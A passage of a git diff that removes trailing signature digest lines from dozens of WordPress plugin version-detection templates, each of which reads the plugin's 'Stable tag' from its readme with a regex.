'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c479299b5a39b6b59e03e6f43d70e01f10a1ac876a93dee67be52a900d78e57a022100c28b8aa98bc0fe02481300ab5906944da0892aeacddfe1605f4d67dea0b82d12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 4c49399096..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022057304a885921ec6a8313993998d794a4c1366b011acd5c352e94c1b10674f9cb0221008e24c7f283320abc9fb059a5fcf4fba28ece98001ed8f67764907f7bb2b67ac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index d4bad3a889..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a0ccfe4a6180cf64f6a9c0a3d60a76bc9926f9be7741c8f67000447f014578ac022100aed0fb31152f3c0cef3c87dc13123254d225ef9895f8c02372f2a631c33412e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index fddf414921..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204b7adc761f7e7efc3979bf8a1f903d386544f716e168a76ebb5984139c6356b1022100b05b5ec29bc5164899adbfa086ab6db3ad01a7defc4d9d1cf142460b66f25774:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 7a15da40ae..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220328979917d0aefa1414affe9c95545ca912895aeb1ffd595123e1d0f732799af02206c07b524647cf29cc4ee15442ab3d2019ac2ac3618282b24c33a2417aed1349f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index ee9f33a75b..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e16a0d5f395a7e6cc5a1ddadf8125245ec7c369995a206e495848bd1bcb2de5f022100a475e756387f0c222d4851a8569179b8636ace4b6c175483f8c93d55f737bd45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 00292a0b43..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022019fbd1b0e5e19a2a0b6de6557b4663a36cc6d438a558f6174eac50465bb7af97022100ce97af8a1b2410a32c58869d5627dcc01f2f1f5116f0c25c6f5b87d5697557b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 34fab4f40f..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022048e76dc56ac458c986968b85b00250b1da3fc52469bef5cf399862f83aec4bee022100942164f7a488214011f20b34b88088c2052cc412a90fa5d94f8c039f51ac94a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index d3f0ccb309..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100defb1f5fb6a12944996e8487c583c638becd2022516045f5c689b9196a3d3038022100a0ebcc3a5f7170d87d37e234d2718b6ebfd2a3c471742be164b3b4e879cf5f6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 7bb408760c..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008e5a0cc77b68af4a58da2212cb9698b32fbbedf5f69a8c7aa11787c51ffb10b0022100e22d42da4821ad29f8f19ab1fcf757e5bb11934652393426f96599a2209af25f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index c01fef6467..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220248cb80d81879604cbfb6fc14c256ea2e2f88f07b21e0f0585a73a6d1ae5a651022100882881a050c4114e433505203e2a1dbc18c33a8e50fc4bcdd09421b0c02b577d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index bc6baec824..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220561d011d797ae882b4e881bf6da00470ed8fe77106d2d1209754d880b90f6a1102201cd906132ef820467a8d4f23a02f8fbb87b811b163e1871a4d9e403dd5b26bc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 352d806edb..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a44a827f9d703e64030affb0cfd00d23ca5d07b8bb7b47514529848f9af0a46902203f2fbe01a2be127a6ebe4fac0f90549fcfd47762765380b2d17c2639d09e2ddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 996274f067..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220593177ff9680e65512c2258842a83ebbd32ff0d1a01d8038d1501f34c289ae68022100e3ef4c76c6073eec90b2b3c27e55ac838318605e56094cd7d4944917dbb69e28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 3d4d5814ec..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f22983fcd88588e24090fd33dfb7adeba111c9b802eaff4f3918ec7c12a18503022100d82a1f726b982661c557c71baedc0f90ea102eb7f21430d105ba8dc7e15b3fd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 49ed27ad2a..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d2672404b5de949267aa8cf4b2d42a3e10ccca5baf6ec5e6c6c3612bcdfa452a02204a7c0ffd7394335581ec284ac77056fdba1aa90cb1a1f9705137dc32e1e74472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 13a2edc7b2..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ddb14a14161905059934162ffd7665ca5b6301eb54001e8311cd2c2a3f9ebf730220568fa65068a6a10a50ebb53d3a3b93423ce86ca3e81a3102405bc9c65383deca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a5dcd19926..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203f5bc03695192782d1c4d6df8a7ac8ff309cf47726e0e489b3e05801bb69623502205cb312cd80a678908fd66a0ecd8cbd8fd64f99489d060569c65bd9fbef78032a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 8f74148fc4..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205073a006c158c2d04545b93e5da61919d5b0ffacbb08157b55ba1a601ee38f45022100f4ea0824db7d0589c0507f64f028775db9e54c4f6133f27d6ee25f9d281fbee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index dab03e8bf1..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009baf94181c758b383ed4ba1417de79dcc91d7d10cbf38317fc0c190842a4f1f7022100e0ef7c121e91b929fb5a756d08bafddca874dcc407f59ad4dde339de6f565e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 91741c35f3..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a39edb024b9c530bf9d903e23dae42b4d4cb9673bb46be96e923e953ad8964b0220018f63f09668642f16ba1baaae1713f528f113e83fdd8f478a4e52db36929f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 595e14fad9..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cf3078969484709c91503a66352a8f2e632b5729b9c2221b8367a690963ccfdb022100c273ddd018cc561d778b792d8181d7bc19214e99713d99e97392ea52c73a7a40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 8a003bf950..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aaa4affb4e6b88677f4b8ce0acff78b393c54c9541d6cc875752fa747a260c2c022002fa58c432c74b2610bdc9dd2182d4aaf92d2b1c3cf8af01e3e9bc1fc87fdf52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 0804a7040d..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a56b5d66ab0aa85cbbf5b4cec5946cdd674250f0bfc4e923abe50458b823f1fd022100dcb430d7a6ec0c75fe2bd5034ff60ebb043b5fafa8d476c5d1e32bd52f16a9da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 2270bbf7a3..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008032f17fe53c4d013fea9ac4d9456a01ad9d51da85f031402a1625ae927fc99502207bfc839505eff9021e4104331bb8118d0e99583345b9b67070d10e11136550f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index d2236fbbcc..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022049f2957ce2c39bb263fa7d1ee4de16e272c340fa0c3d3381b251af393a8751c102205132d43d8c4bc020dd8dcf2d20e526673a56b069112a37187d77fb353e4d9549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index ee9abee9b1..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a570236a6d3ef7a4a2625f35f3f057f749f6e86e9c4f170a9ab911212dad8ea602207a1111b2358d7d016e9f72fa92b5438b60787c6cb6a16972a793dcac442e0faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index fcef4cf8ce..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ee04c916a5f6991c280422273c9862f8e7f68aa382fc63c0f339a6945069bea6022100975fd519013f17dd1002c59fb7a6bad05e835dde2b8cd7462ba9fe9087406a88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d7ad900d8f..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a1171f4dd5bb81cdbc25568448600331c13f1947da34130557034490f347be8022016d7b61e6067953455435251151af010456102d5fd941039ae1127be040448c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 46f236e399..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dcf466aceb4606217db204b58c0a6c89d5787bd588723333724bece7832d9c6a022011f52cb26d3174bddd334e95c3d7b485e89aafc29380c8f17a2591f0bdb4b1a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index d074a27def..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d761fb1287c7d4e2306da854d2efe9dea27c4325eb76d2bc12ea818f5d5c091b022074e578c9635339453a76fbb55b2547877a0d514e027e74b6bef8b21728b23b17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 6d0b7fa0cd..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a4d460797062a547c1a810f4d4d3ac13d0d3f000bc687683833c36fb2f6b8687022100d7a0ab3e73f0ee93f56a3c494ac199ffe3e1eaaed7aa3d5fa584c61206d8ae79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 6615ee4eab..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022003e1e593d21d00547bbcc8aaeaa124fa3a4d3922a3f287195724e9cec05579b6022065ab16548124c50a4a34949a5540da475e73bc21d31f5dcea004b40ca68cff9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 91f139e5b8..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220750387cb0edff789b44acbfa47d73e33e729d562de643274ead8e842d6bdd234022100c138f830f1b1f98d3d80b68398b2ca1cd79a1b0f366d1ece1ca0c5a57f133886:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index f8071b5b02..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100afac994865a3974329c64c072965da8d7ad6983d22a2110af1024da7c57a529502207b2b0bee48dd517038f29e70c7e4cda7fa976725c2f1037aa827684c6d89861d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index d3c83e6fb6..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ce751f1fb1f5edd2bb78cccb2ace7e77b88c4668e607809aba39542990154d1a022100dd3cd88df50350b1b3bd728474011f3a0627e93296a753660c03c62f991eeb0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 260d86ce8d..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 480a00453043022037542fd370f6a7a14b93fce3808858cb727adf46aea74d4cb1b0fd4d33883c92021f60232e5ac7395ea691abbe651a04071b2ab6e32d01682080cd4e74886c0459:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index d58b076cf7..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ba79906c7a57f9dda85d29de2f60d49c17d9d0871c7b12cb16892bfa90f6124402205554759bb55303ca5c38abea0eb13ba9aef4d86c84add24406749b888edfad17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 66ec52f9ce..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204788617abb3fc0b0eb069f763c0d345d3c08a137b7d0d3c0f6e58072e7e5dbbf022100a751237a6c97658f45b541b02fe8226a478cfbf87b9e9dd53264ef85789a313b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index e7e7b51d24..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f153e96c7176289a5aed442ff76e5e25059b631797f2c4f97668fbe1f8842b0f0220105bc8f6586649d8a33f81a610eaae0d05436bbdce9cfa52d305b9cf865900dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index d78c1cbfa5..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220560d27d3020cca490176766815b51ea4963358f1d9616047a5c03b32219c5553022045c0f73c33adad5feff529cdae3ad2885b1d845c5500e4323005ed9c2462423a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index e2db00b5c9..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022049345a19f596ced7a941049b51d736b62c4e3ef8db41c917fdcc4d93cc4592dd022100a092b986fc9875c5ecd70132cd145bfc1aaa775b6a92ba411211da7df789c526:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index f2af2d22ee..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207100f60b8e14f9473fcc3b5420643f70dabe56c1dbac5c4876ad3a5122a64f7c0220091f6d1ddcbf4399e8e90ea22774d6683b5c91d41479373fc73b15bb157bf430:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index bf577986fb..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100959406bf7400ed0fb92cfa15d4f61f25749beacd29b9d726d0634a7b65c8eb1d0220158b6674172b8c6a6cfe11a24d8b4ed3e210044bc71f7b8936683b4ef7c946f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 969283575d..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203702e56aa4bb871a382a5ef2060fb39ae162f124d0d2c789cfdc7c1b198c522302201135453952209425027a72a727988e058ba830fa4332f48f3855ffb6702c38de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 005e702e67..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203e612d4422b637bbe85da7d69290d9aa2333a1be2347d84f624937c7f79093f2022100c90796d6d816ac368e07bec330afc271afed31ecdedee71099df4c82fd1223b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 82c3519c9e..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ef5923e8da5d782d52eb974b104c76780b60c47d181fabafb209a3fcfed40dfd02201f10548f633a740fff507c2616b7e212a190ad66bcddc21849dce32fa7b5f33a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 562ef795ac..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 